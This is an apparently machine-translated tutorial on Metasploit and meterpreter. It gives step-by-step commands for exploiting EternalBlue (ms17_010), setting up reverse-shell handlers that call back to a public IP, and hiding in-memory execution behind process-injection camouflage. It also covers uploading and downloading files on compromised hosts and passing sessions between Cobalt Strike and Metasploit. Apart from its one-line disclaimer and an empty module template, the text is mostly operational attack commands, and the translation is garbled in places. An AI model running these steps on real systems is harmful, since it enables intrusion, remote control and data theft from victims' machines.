Detailed msf - meterpreter - penetration testing tutorial

Detailed msf - meterpreter - penetration testing tutorial

foreword

This article is only for learning and reference, and should not be used for illegal things! !

As we all know, msf is a recognized artifact. When I was young, I didn't know the fragrance of msf and always wanted to write programs by myself.

Now I find that msf is very powerful and can be developed on its basis.

msf is a framework, what does it mean? It can be used to do a whole set of processes of penetration attacks, including early exploration (development), mid-term attack (opening a group), and late-stage control (to push towers).
We can develop our own programs on msfconsole (with its own hero), programs can take advantage of modules in msf (with its equipment)

Introduction to msfconsole

Metasploit is an open-source security vulnerability detection tool that ships with hundreds of known software vulnerabilities and maintains frequent updates. A powerful penetration testing framework dubbed by the security community as "can hack the entire universe".

Five modules:

Exploit refers to an attack performed by an attacker or penetration tester by exploiting a security vulnerability in a system, application or service.

The payload is the code we expect the target system to execute after being penetrated.

Shellcode, is a set of machine instructions that is run as an attack payload in a penetration attack, usually written in assembly language.

Module (Module) refers to a piece of software code component used in the Metasploit framework, which can be used to launch penetration attacks or perform some auxiliary attack actions.

Listener is a component in Metasploit that waits for network connections.

How to use msfconsole - common commands

Use it directly and make an attack

#初次使用：
service postgresql start 　　　　# 启动数据库服务
msfdb init　　　　　　　　　　　　　# 初始化数据库

#之后使用：
msfconsole　　　　　　　　　　　　　# 启动metasploit

#查看帮助选项
help 

#search - 查看漏洞：
search ms08_067

#use - 使用漏洞：
use exploit/windows/smb/ms08_067_netapi

#show - 查看可以攻击的靶机操作系统型号（targets）：
show targets

#set - 设置target 参数（xx是对应被攻击靶机的型号）：
set target xx

#set - 设置rhost参数（攻击靶机的ip地址）：
set rhost 192.168.xxx.xxx

#show - 查看参数：
show options

#进行攻击：
exploit

For specific parameters, see the help option
help

msfconsole attack actual combat

Since msfconsole is an artifact of intranet penetration, the effect on the extranet is unsatisfactory, and port forwarding and other things need to be considered.

E.g:

在内网，反弹shell可以直接链接到本机IP，
在外网，如果端口转发，回连的IP为外网IP，回连的端口为外网端口

After the payload is successfully uploaded and executed, the meterpreter (pseudo shell) of the target can be obtained

Take an EternalBlue vulnerability process as an example

Penetration process:

First scan with the smb module of msfconsole to see if there are any vulnerabilities

use auxiliary/scanner/smb/smb_ms17_010

Vulnerable

use module

use exploit/windows/smb/ms17_010_eternalblue 
show options

Set goals:

set rhost 192.168.148.137
#设置payload等
set lhost 192.168.148.134
set lport 4444
run

Result:

View information:

ok
According to the online tutorial, the payloads are all 64-bit. If the target machine is 32-bit, the architecture will be wrong. You need to download a new module and load it.

How to load new modules and develop new modules, please see the catalog: Loading external modules: Follow-up on the actual combat of ms17_010

Remark:

By default, if a session will have no activity for 5 minutes (300 seconds), it will be killed, to prevent this, change this to

 set SessionExpirationTimeout 0

End of penetration:

When the target is penetrated in batches and there are many sessions (the results of many successful attacks), we can perform the following operations

#查看目标
sessions -i 

#选择目标
sessions -i id 

#批量执行命令
sessions -c cmd 

#批量执行命令
sessions -C "meterpreter_cmd"

#从选择的目标返回
background 

#退出session，而且关闭所有meterpreter
exit 

Loading External Modules: Follow-up on the actual combat of ms17_010

If there is an architecture error in the payload, as shown in Figure 4,

You can use the module on github
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
to copy to the ROOT directory and unzip it.
If it is the msf that comes with kali, copy it to

/usr/share/metasploit-framework/modules/exploits/windows/smb

If it is the msf downloaded after Linux, copy it to

/opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb

open msf,

reload_all
reload
use exploit/windows/smb/eternalblue_doublepulsar
show options

The exp may be customized based on windows, there are some problems running on linux, so install wine32

wine  -h

Exploit
again and an error is reported, try process injection camouflage

set processinject explorer.exe

ok, successfully bounced the shell

meterpreter command execution

1. upload - upload file
   upload exe to target machine c:\ls\

   upload 1.exe c:\\ls\\
   

2. download - Download the file under any path with the corresponding permissions of the target target machine
   Command download file path

   download c:\\ls\\1.exe
   

3. sysinfo command
   Displays the system information of the remote host, including computer, system information, structure, language and other information.
   Run the cmd.exe program on the target host and directly interact with the meterpreter session in a hidden way

   execute  -H -i -f cmd.exe
   execute  -H -m -d notepad.exe -f  1.exe -a "-o 2.txt"
   #-d 在目标主机执行时显示的进程名称（用以伪装）
   #-m 直接从内存中执行
   #"-o 2.txt"1.exe的运行参数
   

4. portfwd command:

   # 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy
   portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx
   #查看指定端口开放情况
   netstat -an | grep"yyyy" 
   

5. For more commands, enter help to view

   show options
   set RHOSTS 127.0.0.1 127.0.0.2
   bounces two shells, this time
   sessions -i 9 can connect to 127.0.0.2 through meterpreter

   We go inside the target,

   upload sometimes fails:

   [-] Error running command upload: Rex::TimeoutError Operation timed out.
   

​ Error reasons: insufficient space, high network delay, etc.

msfconsole development practice

In addition to basic usage, you can also develop msf, add modules, modify code, etc.

Browse the msfconsole directory

name	content
data	user interface code
documentation	Documentation
external	Source code such as meterpreter
lib	ruby library (so, to learn Msf well, take a look at the ruby ​​tutorial)
modules	various modules
plugins	Various plug-ins such as database connection plug-ins
scripts	The script used by the meterpreter module
tools	Miscellaneous Tools + Scripts

The most important thing is the module, which contains various modules, which can be called and called each other.

Write a module (exp module as an example):

Writing exp module ideas

The real work of exploit development is behind the scenes. It's not actually your language of choice. What you need to think about is: focus on exploits, nothing else

exp module field

function field	content
Name	Vendor, Software, Faulting Component, Vulnerability Type
Author	author
Description	Notes
Platform	Supported platforms, such as: win, linux, osx, unix, bsd
targets	An array of system, application, settings or special settings, the second element of the entire array is where you store the special metadata of the target. Such as specific offsets, widgets, ret addresses, etc. When the user selects the target, the metadata The data will be loaded and tracked "target index" and can be retrieved via the target method.
Payloads	Specifies how the payload should be encoded and generated. You can specify: Space, SaveRegisters, Prepend, PrependEncoder, BadChars, Append, AppendEncoder, MaxNops, MinNops, Encoder, Nop, EncoderType, EncoderOptions, ExtendedOptions, EncoderDontFallThrough.
DisclosureDate	public disclosure date
Arch	Architecture
check	Optional, the function called by the check command
exploit	main function, the real exp function

exp module example

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  def initialize(info={
    
    })
    super(update_info(info,
      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
      'Description'    => %q{
    
    
        Say something that the user might need to know
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Name' ],
      'References'     =>
        [
          [ 'URL', '' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'System or software version',
            {
    
    
              'Ret' => 0x41414141 # This will be available in `target.ret`
            }
          ]
        ],
      'Payload'        => {
    
    
          'BadChars' => "\x00"
        },
      'Arch' => ARCH_ARMLE,
      'Privileged'     => false,
      'DisclosureDate' => "",
      'DefaultTarget'  => 0))
  end

  def check
    # For the check command
  end

  def exploit
    # Main function
  end

end

load module

Copy the rb module to

/opt/metasploit-framework/embedded/framework/modules/exploits/xxx(你取的文件夹名)/xxx.rb(你的文件)

open msf,

reload_all
reload

Later

use exploits/xxx(你取的文件夹名)/xxx.rb(你的文件)

msfconsole extension (used in conjunction with CS)

• Both CobalStrike and Metasploit are infiltration tools, each with its own strengths. The former is more suitable as a stability control platform, while the latter is better at various types of detection collection and vulnerability exploitation in the intranet. The two need more flexible linkage and rely on each other to improve the efficiency of penetration.

CS session goes to msf

1, cs online a pc

2. Set up msf monitoring

#msfconsole
​    use exploit/multi/handler
​    set payload windows/meterpreter/reverse_http #（这里注意不是TCP，cs4.2我没找到外连TCP的）
​    set lhost 103.234.72.5
​    set lport 10086
​    show options
​    exploit

3, cs set the listener

Right click on spawn and select this listener.

Go back to msf and you can see that the machine is online.

sessions -l View all sessions

There are far more ways to use CobalStrike and Metasploit in linkage. Each method has corresponding application scenarios in actual combat, and needs to be explored and summarized.

2. The session of msf is transferred to CS

1. First, hang the meterpreter obtained on msf to run in the background

​ Execute the command: background, you can

2. Then use exploit/windows/local/payload_inject to inject a new payload into the session. The specific commands are as follows:

use exploit/windows/local/payload_inject
​    set payload windows/meterpreter/reverse_http
​    set LHOST 103.234.72.5 //cs主机地址
​    set LPORT 84 //随意设置监听端口，需要和cs保持一致
​    set session 2 //设置需要派送的meterpreter
​    set DisablePayloadHandler true //禁止产生一个新的handler

You can see that the machine on the cs side is already online.

• CS+MSF Summary

  There are far more ways to use CobalStrike and Metasploit in linkage. Each method has corresponding application scenarios in actual combat, and needs to be explored and summarized.

  Detailed information collection in the testing process means different penetration testing routes , and only the associated use and reuse of information can more effectively magnify the penetration results.

Summarize

MSF can be regarded as the C language. By calling the library, it can complete various batch, high-energy, stable, and high operations, which is very easy to use!